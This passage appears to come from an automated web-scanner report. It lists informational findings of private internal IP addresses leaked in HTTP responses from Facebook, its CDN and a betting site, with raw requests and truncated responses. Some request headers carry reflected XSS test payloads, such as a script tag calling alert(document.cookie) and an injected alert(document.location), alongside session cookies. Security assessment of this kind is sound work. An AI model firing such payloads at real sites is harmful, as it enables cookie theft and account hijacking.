Vary: Accept-Encoding
Cache-Control: public, max-age=31004184
Expires: Wed, 09 May 2012 09:08:35 GMT
Date: Mon, 16 May 2011 12:52:11 GMT
Connection: close
Content-Length: 60989

/*1305018491,176820666*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dO6dA"]); }

WidgetArbiter={_findSiblings:function(){if(WidgetArbiter._siblings)return;WidgetArbiter._siblings=[];for(var
...[SNIP]...

22.24. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z5/r/55ZG1uMFCrx.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/z5/r/55ZG1uMFCrx.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css

Response

HTTP/1.1 200 OK
Content-Length: 1544
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 19:09:39 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Cache-Control: public, max-age=30894502
Expires: Tue, 08 May 2012 02:33:24 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR.............( .`...sPLTE......;Y.G....b..R......333...}}}...~P...._er...OUglllkkk........m{{{...^^^.r.......[[[...........o.vIDDD.....................Kg...........U.........W.........
...[SNIP]...

22.25. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.185

Request

GET /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:52:55 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.17.185
Vary: Accept-Encoding
Cache-Control: public, max-age=26118177
Expires: Tue, 13 Mar 2012 19:52:41 GMT
Date: Mon, 16 May 2011 12:49:44 GMT
Connection: close
Content-Length: 1900

GIF89a . ....Ro.y.................e~.........................................................................!..NETSCAPE2.0.....!.......,.... . .... &.di.h..l..p,..AX.E....../.#\.H...<*G...y..,..u....
...[SNIP]...

22.26. http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zC/r/5b5JL166gaA.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/zC/r/5b5JL166gaA.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

Response

HTTP/1.1 200 OK
Content-Length: 691
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 19:09:39 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Cache-Control: public, max-age=30894566
Expires: Tue, 08 May 2012 02:34:28 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR.......N......b.,...zIDATx...1k.Q......L......Y. ..q.XI..L...X.4b%((B.....irpU.I+...V'3a.Y......w.G.~Y.eo~7o.]..D.a1.|4.1D.....J. ...<I....I~.#..2...i+9TJ*........KD.....8'..H2.b.wE...
...[SNIP]...

22.27. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/zD/r/B4K_BWwP7P5.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:51:27 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=26118385
Expires: Tue, 13 Mar 2012 19:51:26 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 1009

.PNG
.
...IHDR.............l.`o....PLTE...{..p..cy.h~.....................................Jd........................................o.Uk.Pi.MZt.\t.Ys.]v.u.[......_x................[t.Xr.......c{.p.V
...[SNIP]...

22.28. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zM/r/3CROxDf49ph.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/zM/r/3CROxDf49ph.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css

Response

HTTP/1.1 200 OK
Content-Length: 589
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 19:09:40 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=30896306
Expires: Tue, 08 May 2012 03:03:28 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR...!...F.....u......PLTE.........^uqCW..............................T\l.U....x......N..........0D.l}.......q.................{.......................v......%....................;....
...[SNIP]...

22.29. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css

Response

HTTP/1.1 200 OK
Content-Length: 267
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 18:06:32 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Cache-Control: public, max-age=30894588
Expires: Tue, 08 May 2012 02:34:50 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR.............f.~s...BPLTE...CX.CX.......CY....iiiPi...............................Pi.BW....}.......tRNS.@..f...wIDATx^..I..0.DQuk..0...*r0.\...W*.d9...H.w....tS.E.8...W..7.?Z.[..J+@\
...[SNIP]...

22.30. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.65

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.31. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.104.41

Request

GET /?ref=ts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTSnNr7_aB426uwgNhTYi; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=9diln; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.104.41
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.32. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.27.42

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.33. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.1.35

Request

Response

22.34. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.102.57

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.35. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.125.37

Request

GET /WinningsCom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTUL_tgD2ziT00tqpXWhe; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=05pE2; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.125.37
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.36. http://www.facebook.com/crazyscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crazyscratch

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.134.58

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

22.37. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.138.33

Request

Response

22.38. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.65

Request

GET /extern/login_status.php?api_key=115813460972&app_id=115813460972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df21c419057025ec%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2a062fb63f73d%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1352f1a0db1c54%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3552aedd5cd8c8%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df9a75212f7bdd%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=P0T0X; reg_ext_ref=http%3A%2F%2Fwww.primescratchcards.com%2Findex.asp%3Fcurr%3DUSD35af5%2527%253balert(document.location)%2F%2Fd13433ff10e%26g%3D3; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; wd=1137x805

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f3552aedd5cd8c8&origin=http%3A%2F%2Fwww.metacafe.com%2Ffc9e99a80b4bc2&relation=parent&transport=postmessage&frame=f3f297822f45e2
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.132.65
X-Cnection: close
Date: Mon, 16 May 2011 12:52:03 GMT
Content-Length: 0

22.39. http://www.facebook.com/pages/BigMoneyScratch/156518521055171 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/BigMoneyScratch/156518521055171

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.38.33

Request

GET /pages/BigMoneyScratch/156518521055171 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.40. http://www.facebook.com/pages/PrimeScratchCards/122783514413813 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/PrimeScratchCards/122783514413813

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.90.55

Request

GET /pages/PrimeScratchCards/122783514413813 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.41. http://www.facebook.com/peoplespostcodelottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peoplespostcodelottery

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.53.64

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.42. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.254.27

Request

Response

22.43. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.55.55

Request

Response

22.44. https://www.interwetten.com/cs/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/cs/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /cs/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=cs; expires=Sun, 16-May-2021 12:42:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:07 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=93ae7ba8356b64ceadfcb45be112a0aeede56be1";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.45. https://www.interwetten.com/de/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/de/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /de/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=de; expires=Sun, 16-May-2021 12:42:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:09 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=68e2566d2888379f748c4e5bd95a38dbad94e3c7";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.46. https://www.interwetten.com/el/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/el/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /el/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=el; expires=Sun, 16-May-2021 12:42:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:09 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=aa9126912cc8ad697ed896fd8e15338360ccb69d";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.47. https://www.interwetten.com/en/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 11:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:44:27 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 33754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...
<script type="text/javascript">
